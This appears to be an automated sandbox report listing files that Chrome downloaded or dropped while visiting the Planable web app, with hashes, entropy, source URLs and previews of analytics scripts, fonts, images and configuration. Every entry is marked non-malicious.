                                                                                                                                                                              SHA-512:61F304DAAC7181483431FA7EA668655C813AFB413FC49A6A131D14B1AA372E6F0167F1A0CC088BEFB9A8D274C0F5FE2E4C98B64B420A4DF8A337EE5EAAA0E9E9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.googletagmanager.com/gtm.js?id=GTM-TX54JPZ&l=dataLayer
                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"15",. . "macros":[{"function":"__e"},{"function":"__v","vtp_name":"gtm.elementUrl","vtp_dataLayerVersion":1},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"user_email"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"}],. "tags":[{"function":"__googtag","metadata":["map"],"once_per_event":true,"vtp_tagId":"G-HR91C4PWHQ","vtp_configSettingsTable":["list",["map","parameter","send
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 34852, version 1.0
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):34852
                                                                                                                                                                              Entropy (8bit):7.99370036872867
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:0E8EEFB4549A2EDF26C560CB9845952E
                                                                                                                                                                              SHA1:8D0B1718AACAD934FD0043C87CBC54AA091396BF
                                                                                                                                                                              SHA-256:7F653B3CE9D3277457FC6DA4EDB246AE2F6C913F088C42DCB8CD2E96267AA21A
                                                                                                                                                                              SHA-512:237659DD4B8680AB4856D38290D57AE9211B479C51033D8DB4AC61326551E33CC245EBF10EED35AAB6854D8196D6651EB70CB63A2BA1D7373404851FE084772E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://fonts.gstatic.com/s/ubuntu/v20/4iCs6KVjbNBYlgoKfw72.woff2
                                                                                                                                                                              Preview:wOF2.......$......<................................r..2.`..V........#...........,...(.6.$..T. ..v..X..q[.+...n..!..m.ad..%.`.b...$...q..`..@.m~......IE.L:H...........A9.(u@F.(.E>..TZ.>..<L.],....&!...(x.R.Q:....yx..+r~.....r,..R.....\y..|:.\..*.9.$r...|..j].....-.0_..9=...B...}.U.`..2.L.........O..n.I];....P.7....GO..k..*.w.]$Q..M..t..!(..>p8...a...&....@............p.*......LIC.....X....*J............t.w.l....J..k...D.}o...............Y..D.....m....".6"r..Y.f`......V..E.U$...g}../.....I(.>u.....U.`n....`.............F.(0Q....BQ.9...#.Q...|...kZy.5ee..2....{Z.....+5w..1..bG".$......;..sE.=g(i...kB...Jj....VUWWu5T.t.4..fF.Z&.,....l.9a...Zr..V.V...4,........./.t?.B.2I ...t .J.......\.v.*vn.r.f@T.:Qtdp.........@l.x....)......A9Ra%..5`.s(..|.C..S'R.W...t(..u.....S.....DG~.h..`.7hG...z..pf.Kk..F....k.N%..S....2.8jN..V.H;.v.B.....2...j6$.6......Gt..> ;cgh.> ./_.....*.K..hC.@.:J..._]*.v....s3,m.....K.b...zZ..1w............([.=.5...l......
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (1234)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):21351
                                                                                                                                                                              Entropy (8bit):5.503622110294562
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:AC43CF3B4914E73C29910415BD19DB97
                                                                                                                                                                              SHA1:AB38BFA238B44E53F05AA778721D9585D0C6EA9D
                                                                                                                                                                              SHA-256:FA98E49ACB4BA980865779FA22B7CE1C48BDD56CB44A0FE19A8D6899F5FFE077
                                                                                                                                                                              SHA-512:8E36FC6B94073AA48C729342AC02287B0965A4375DB8A6F056F034044F43BCA51CE449FDD581B49839BE592BB4375D3891C90C0AFCCF6C326ED0CD43E27C43C1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.googletagmanager.com/static/service_worker/5190/sw.js?origin=https%3A%2F%2Fapp.planable.io
                                                                                                                                                                              Preview:'use strict';var ca=function(a){function b(d){return a.next(d)}function c(d){return a.throw(d)}return new Promise(function(d,e){function f(g){g.done?d(g.value):Promise.resolve(g.value).then(b,c).then(f,e)}f(a.next())})},h=function(a){return ca(a())};/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var p=this||self;var t,y;a:{for(var da=["CLOSURE_FLAGS"],A=p,B=0;B<da.length;B++)if(A=A[da[B]],A==null){y=null;break a}y=A}var ea=y&&y[610401301];t=ea!=null?ea:!1;var E;const fa=p.navigator;E=fa?fa.userAgentData||null:null;function F(a){return t?E?E.brands.some(({brand:b})=>b&&b.indexOf(a)!=-1):!1:!1}function G(a){var b;a:{const c=p.navigator;if(c){const d=c.userAgent;if(d){b=d;break a}}b=""}return b.indexOf(a)!=-1};function H(){return t?!!E&&E.brands.length>0:!1}function I(){return H()?F("Chromium"):(G("Chrome")||G("CriOS"))&&!(H()?0:G("Edge"))||G("Silk")};!G("Android")||I();I();G("Safari")&&(I()||(H()?0:G("Coast"))||(H()?0:G("Opera"))||(H()?0:G("Edge"))||(
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (3390), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3390
                                                                                                                                                                              Entropy (8bit):5.079479572656825
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:CE0D1DB2839551BDFE4CEBC4E463BCB4
                                                                                                                                                                              SHA1:F9663F5DFB5EC632704F776DE0FA54F33F638DAE
                                                                                                                                                                              SHA-256:7940A0127C109399AA86DDC2BAE0F5C499B3F96C3F2A138D185EE8CF22CA29FC
                                                                                                                                                                              SHA-512:964B4258F95E98DE7B159F45BF146382E0971550C043ED81394687629B7E8FED7B7A24A1FF92E6FF1E578E4AB78E78302B29C69BD5851BF4A5CCCD28658AC1FA
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:/**/__jp0({"success":true,"app_id":"41c13a31-b58c-47df-8ade-7656a883cd4b","version":2,"features":{"restrict_origin":{"enable":true},"cookie_sync":{"enable":false},"metrics":{"enable":true,"mixpanel_reporting_token":"7c2582e45a6ecf1501aa3ca7887f3673"},"enable_on_session":false,"web_on_focus_enabled":true,"session_threshold":30},"config":{"siteInfo":{"name":"Planable","origin":"https://app.planable.io","proxyOrigin":null,"defaultIconUrl":"https://img.onesignal.com/t/99964bbf-98f3-449f-8dfb-fafb6c754744.jpg","proxyOriginEnabled":false},"integration":{"kind":"custom"},"setupBehavior":{"allowLocalhostAsSecureOrigin":false},"autoResubscribe":true,"staticPrompts":{"native":{"enabled":false,"autoPrompt":true},"bell":{"enabled":false,"size":"large","color":{"main":"#E12D30","accent":"white"},"dialog":{"main":{"title":"Manage Notifications","subscribeButton":"Subscribe","unsubscribeButton":"Unsubscribe"},"blocked":{"title":"Unblock Notifications","message":"Click here to learn how to unblock not
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):291105
                                                                                                                                                                              Entropy (8bit):5.321615993730622
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7E91359B46E1DA637080A03B759164FA
                                                                                                                                                                              SHA1:3EBDD6C80B01829F12032F49E706FF56EB3CD9F5
                                                                                                                                                                              SHA-256:785D3E9EA187B7242E1A4365A48C3FD95DD7A469245D24C6769B8D46C4EF4B81
                                                                                                                                                                              SHA-512:336374B44751892428DCCAC57868CB86B5E437B2A3E6D65BBFF1F22E3BB34BBA11F0F68F7E516FA15CF6EA1C9ED9DAC86BBDC033ED1798A5F9E4FE8BD2827324
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:!function(e){var t={};function i(n){if(t[n])return t[n].exports;var o=t[n]={i:n,l:!1,exports:{}};return e[n].call(o.exports,o,o.exports,i),o.l=!0,o.exports}i.m=e,i.c=t,i.d=function(e,t,n){i.o(e,t)||Object.defineProperty(e,t,{configurable:!1,enumerable:!0,get:n})},i.r=function(e){Object.defineProperty(e,"__esModule",{value:!0})},i.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return i.d(t,"a",t),t},i.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},i.p="",i(i.s=27)}([function(e,t,i){"use strict";i.d(t,"a",function(){return n});Object.setPrototypeOf||Array;Object.assign;function n(e,t,i,n){return new(i||(i=Promise))(function(o,s){function r(e){try{c(n.next(e))}catch(e){s(e)}}function a(e){try{c(n.throw(e))}catch(e){s(e)}}function c(e){e.done?o(e.value):new i(function(t){t(e.value)}).then(r,a)}c((n=n.apply(e,t||[])).next())})}},function(e,t,i){"use strict";i.d(t,"a",function(){return n});class n{static shouldLog(){try{if("undefined"
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):141
                                                                                                                                                                              Entropy (8bit):5.063549027622842
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1AFE9504CC4CB1D9D5D004E21E7EA836
                                                                                                                                                                              SHA1:CEDDA315F8361D225F0733AA369FD04A72BC6B61
                                                                                                                                                                              SHA-256:1B84ED01366C7ED4812C7C130575FD76480E32DD635EF37C02C32AA1E7221AF0
                                                                                                                                                                              SHA-512:647F87910DB58F340D12CCF5EAC440BA05E93B40E72C1CC613E5C4BD0EE314FA3DB7723972323DC1576BE22C7716373207298D1DDBA7A55591391248B6040A4C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:{"message":"Route GET:/logs/ingest?hostname=production&now=1736508223225&tags=LogDNA-Browser not found","error":"Not Found","statusCode":404}
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (9284)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):245020
                                                                                                                                                                              Entropy (8bit):5.453937864649824
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:645219BB69D1C9F06CC935CC54DC1C2A
                                                                                                                                                                              SHA1:F14ACE0F9745356BC77D888857EF32A5EADC8615
                                                                                                                                                                              SHA-256:5332FD32D8BE28EB2531721220E8C3C561000378988BE4B4D7F97568F0B3F224
                                                                                                                                                                              SHA-512:CB41C3768945DA663B54A29758D6BDFFFD4666C6EEEB253017748831CB424CB54113CFE9DF06959E980E0A7B9EACB6F0D9DD1016B3A9B1BC900FAB79A30AF837
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                              Entropy (8bit):3.180832987205441
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:6D22C9B4F9EB23358B2554EC2228CFCE
                                                                                                                                                                              SHA1:CE405127C10DE7FDDDE1D55897F16E538FE964C0
                                                                                                                                                                              SHA-256:F47624527C315234471757DB3D8ECC1A767E08A4C49AD7BCC4DA8C1F4864FDD8
                                                                                                                                                                              SHA-512:68A978F16555D466A89CC14731624C6CF42A3C37D04013EC52C657E0A570359547C64F61D186CCEE5AA62B5AE718C1C2531AED89B70D0D70C527FFBFFD55E96C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:1736508277489
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (32401)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):10937735
                                                                                                                                                                              Entropy (8bit):5.587916581865757
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:DC7134CF89C20AB3230EC2129D95F880
                                                                                                                                                                              SHA1:D1AECF5EB93599CE32E882F4E79A49811CF9BAFC
                                                                                                                                                                              SHA-256:A57597A34B77990FF6512246D050FE5A9013C39067A34F75B893A1D5B5EE7DE6
                                                                                                                                                                              SHA-512:A5AB4CD4FBCB919024BC1EF18AB42DC682849D6BE23B30DC9F28EEB4CD3A9AB402E214081960AA0412A6C702A7CDC6AAE5C60889D74AAC05D7896F6E28C57FE2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:!function(){(function(){function e(){this._promiseInfoMap=Object.create(null)}var n=e.prototype;n._define=function(e,n){n=n||{};for(var t=arguments.length,o=2;o<t;++o){var r=arguments[o];for(var i in r)i in n||(n[i]=r[i])}this[e]=n;var a=this._promiseInfoMap[e];return a&&a.resolve(n),n},n._has=function(e){return Object.prototype.hasOwnProperty.call(this,e)},n._promise=function(e){var n=this,t=n._promiseInfoMap[e];return t||((t=n._promiseInfoMap[e]={}).promise=new Promise(function(o,r){t.resolve=o,n._has(e)?o(n[e]):Meteor.startup(function(){n._has(e)||r(Error("Package "+e+" not installed"))})})),t.promise},this.Package=new e,"object"==typeof exports&&(exports.PackageRegistry=e)}).call(this),(function(){var e=Object.prototype.hasOwnProperty,n=[];function t(t,r){n.push({name:t,runImage:r}),function t(){if(!o){var r=n.shift();if(r){o=!0;var i=r.runImage.call(this);(function(n,t){if(!n.eagerModulePaths)return t();var o=-1,r={},i=!1;!function a(){if((o+=1)===n.eagerModulePaths.length)return
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):7873
                                                                                                                                                                              Entropy (8bit):4.23854323688966
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7FD6982BFD41D6892FC89701DF2663F4
                                                                                                                                                                              SHA1:BA0B9265559650B9A2794149180DFA39A006215E
                                                                                                                                                                              SHA-256:11A058C677DBB1C0B7F510CBE346D354FBA638D59EDBC7E2F3AB2A29F59E7DC9
                                                                                                                                                                              SHA-512:B3F453EF85F18CAF3AA428D497C7C1FAC9143452FF01D35F8CD86E763A650E2EAF94F8BB8A75460819FB89C3F138CC2F040E4F2B5334F692C3878580A91288AE
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://d2dzu5rf27gdz3.cloudfront.net/default/logo-loading-v2.svg
                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="188px" height="40px" viewBox="0 0 188 40" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <path d="M6.44348497,39.8871429 C6.8914902,39.1138367 8.11836427,37.0179592 9.34257603,34.9258776 C10.4768427,32.9874694 11.5694545,31.1202857 11.9257943,30.5051837 C13.2051773,28.2969388 16.3672636,28.3462449 18.6605769,28.382 C19.0167529,28.387551 19.3520401,28.3927755 19.6559939,28.3891837 L21.8180349,28.3781224 L16.6173978,37.3546531 C15.7429316,38.864 14.1421464,39.8098776 12.3937464,39.8503673 L10.8062728,39.8871429 L6.44348497,39.8871429 Z" id="Path" fill="#FECE6A"></path>. <path d="M30.5980854,25.8880816 L33.5987948,20.804898 L27.9594501,20.8324082 L27.9589996,20.8324898 L23.7735625,20.8324898 C17.0749874,20.8324898 14.9217935,24.9319184 13.4929525,27.6522857 C13.3003651,28.0190204 13.1208845,28.3606939 12.945254,28.6638776 C12.3759294,29.6904898 11.9253438,30.5049796 11.9253438,30.504979
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):17174
                                                                                                                                                                              Entropy (8bit):2.9129715116732746
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (51992)
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):52051
                                                                                                                                                                              Entropy (8bit):5.297494436489179
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:0F1FEFECFB213367CC7273A6D8A23996
                                                                                                                                                                              SHA1:B6E28EC4C18466F604EB4414642D6F4BE965C15A
                                                                                                                                                                              SHA-256:0F6434EACEBFBFABEB4139D22CD2C13743D611034124E682009694CAB287E649
                                                                                                                                                                              SHA-512:B4BE2B2AAC8987DDFD4C482EEA1DEA4FBC566B45040FFAD0434208C7B9E3A6C6B0124C5ED7972DF92D098CB52B92E71FBC21A53E3E1BCA226B54AFF5D2961EA1
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:/* Acknowledgements: https://logrocket.com/open-source/ */.!function(){var e={749:function(e,t,r){"use strict";var n=r(836);Object.defineProperty(t,"__esModule",{value:!0}),t.default=void 0;var o=n(r(47)).default;t.default=o},47:function(e,t,r){"use strict";var n=r(836);Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e){var t=[];return["log","warn","info","error","debug"].forEach((function(r){t.push((0,i.default)(console,r,(function(){for(var t=arguments.length,n=new Array(t),i=0;i<t;i++)n[i]=arguments[i];e.addEvent("lr.core.LogEvent",(function(){var t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},i=t.isEnabled;return"object"===(0,o.default)(i)&&!1===i[r]||!1===i?null:("error"===r&&t.shouldAggregateConsoleErrors&&a.Capture.captureMessage(e,n[0],n,{},!0),{logLevel:r.toUpperCase(),args:n})}))})))})),function(){t.forEach((function(e){return e()}))}};var o=n(r(698)),i=n(r(800)),a=r(476)},818:function(e,t,r){"use strict";var n=r(836);Object.defineProperty(t,"
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PNG image data, 40 x 40, 8-bit colormap, non-interlaced
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1598
                                                                                                                                                                              Entropy (8bit):7.363092833240828
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:A0DBF644E9E2436A82719F7ECAE6978E
                                                                                                                                                                              SHA1:A312871A29FE8658E3E034D3CDD3576F12834DD1
                                                                                                                                                                              SHA-256:5A1D1FE3DE2393E657558B8DC1157AEFD4B424030C1DBFFF6EC5C15E945AC6D6
                                                                                                                                                                              SHA-512:6201C6917E6889F305489F78D196735DA307AFE23C3C9F9999B067C83180C657425EB9B01E78DAE31B04F4CECA8866235EF4A4035F8D61B5DAFB5E3F4DB90F6D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://d2dzu5rf27gdz3.cloudfront.net/default/logomark-color.png
                                                                                                                                                                              Preview:.PNG........IHDR...(...(...... H_....sRGB.........PLTE.................@@.......I.........M..F.@..............p.....k..C...m..........o..........l.|.<...j.....<.........r..}...j>...k....}.<.....}.=...%.~..~......>....{.=...j...<.<...|........k=.....|..}...j=.=......k..{.=....=......j.}......=...k..k=...<..|......k..k<....<.....|.........<.;..{..|...........k..<..|.................|..........;......k....|.<...Q;..{.....k.......|...|............k..;..~...j.....;...k..;..{.<....;......{....<...{...k....|.......<...k......c...(.......|.<..{.......C.>.;..{...j.............{...k......L.;..|.......;..{.........f.L.?..|...........{........|...j..........{...j..S......o....;..{.1>.;....tRNS................................. !!"$%&&'',-//012257==?EGIKMNPVWXYYY]aabcdhjopquvxz~~.......................................................................................................................
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (41178)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):41181
                                                                                                                                                                              Entropy (8bit):5.506570824151046
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:5B7F3D5D52BE0A385D899FF0FC459E1B
                                                                                                                                                                              SHA1:2FE6859D9A54A610918DB03FDB0173214BD46A50
                                                                                                                                                                              SHA-256:E6B8A90A2870483ACE67380FF4A64B39BFECB7952A432393470D76A6614FC62C
                                                                                                                                                                              SHA-512:9FCA9353E409DA95843FEB2659036C4F8198AC8B4A3C3C1237A57E8152E76C67864B42669D70ED9DEF2DAD83C177732EF635DA68AF1601F60893BEDBB75D3CD2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://snap.licdn.com/li.lms-analytics/insight.old.min.js
                                                                                                                                                                              Preview:!function(){"use strict";function n(n,t,e){return t in n?Object.defineProperty(n,t,{value:e,enumerable:!0,configurable:!0,writable:!0}):n[t]=e,n}var t,e,r,i,o={ADVERTISING:"ADVERTISING",ANALYTICS_AND_RESEARCH:"ANALYTICS_AND_RESEARCH",FUNCTIONAL:"FUNCTIONAL"},a="GUEST",u="MEMBER",c=0,l=1,d=2,s=(n(t={},a,"li_gc"),n(t,u,"li_mc"),t),f=function vr(){var n=arguments.length>0&&arguments[0]!==undefined?arguments[0]:null,t=arguments.length>1&&arguments[1]!==undefined?arguments[1]:null,e=arguments.length>2&&arguments[2]!==undefined?arguments[2]:null,r=arguments.length>3&&arguments[3]!==undefined?arguments[3]:null;for(var i in function(n,t){if(!(n instanceof t))throw new TypeError("Cannot call a class as a function")}(this,vr),n=n||{},this.consentAvailable=!1,this.issuedAt=t,this.userMode=e,this.optedInConsentMap={},o)n[i]=n[i]||c,n[i]!==c&&(this.consentAvailable=!0),this.optedInConsentMap[i]=n[i]===l||n[i]===c&&r===l},v=(e=[o.ADVERTISING,o.ANALYTICS_AND_RESEARCH,o.FUNCTIONAL],r=[c,l,d,c],i=new R
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:gzip compressed data, from Unix, original size modulo 2^32 777125
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):180969
                                                                                                                                                                              Entropy (8bit):7.997713838778794
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:1CFF2B545140EF74AC358147BD8AF25F
                                                                                                                                                                              SHA1:DE3420955EF459DD9AF7BB71C7CE68DD63C43CE3
                                                                                                                                                                              SHA-256:B4E8F5C3BFE52F4E9676086B624F7C9B14510340B45BA1E92C11777985E68F85
                                                                                                                                                                              SHA-512:8CADF61397E8FA04958F9682157DEC48F3529D2DFDF935994EBFAC2FCFDDA3EBFD91AC24CBD8536A2515CEC7BC15ACA7D46A216715C4475479DD3A98E8A1F261
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:...........[s.H...>....&..0/...V.\.*.r[r]ZG[..I.....(.....O.9q..D..D.y..y.......Yke&.....k....@ ...Z..Z...Vy.F.... ../....M.0.L}....;..;.C.../b......vr.T.....fX...~bu.1......n..`<... .Q?.._.........,.WOO...3v.....t....m.r...v..j.n..=.{<.EA.h.".....r.J.....F.y....A..pkwks..p....j..~..`....U..we...F<q,..{......M.N.c..w..o-.'..........x...I8u...ug.....Wc...^B-,..cM.c...v..}m..S.]8C._w....8......$..N..^.h....qgI..|\zI=./...#'.g.q'.%.....0...7..L..Py.9..B.+.?.U.$...S7.A.Yw......XV.B}..a...`.KS.z2.Mz7=X:.(........h..z...Y|W..TV.Qo...fv..4..y..&..{OM..0wp.;j.W....U...7..G........,....V.5..\.Q7..~....cA...fv`.u......b....u~*.l........-?...W..:.@....n$....B.2.{z..y.....$..[.v..l.....V;...kt..:s..!.F....'z.J.K..y..T.Ua...PT.A%.X7..../.F`_....o.<.%.5...i.:....8v3l...K.<...M\...e.l....M.TkL...V.j..j..Y-..4V..R..\......_.<....WN`.....i=.....&..L.J.V.........:.B.G..'.....<.*..|...".^pq.TBj~\...2v...WJ.].U&<....-..e..E...b.YH..U....8.....n.v..S
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 406986
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):116343
                                                                                                                                                                              Entropy (8bit):7.997640489040715
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:3063B0DA40B45B46602FCE99AC53D315
                                                                                                                                                                              SHA1:57883FF854B80AD2A76479A0273BE9218B4DA553
                                                                                                                                                                              SHA-256:C60FB365DF08D31F36EDA468941C309AE3A917ED784A30495800F05E5F98B66B
                                                                                                                                                                              SHA-512:3EAF55117A825B588972F6AE324F6173EF4F2A309BAB69A9A6CC43C8F9A4EE25C2FA86752C8912542CC353727DC54A034B369D4A4451F0C3B20206C16FA9FE98
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
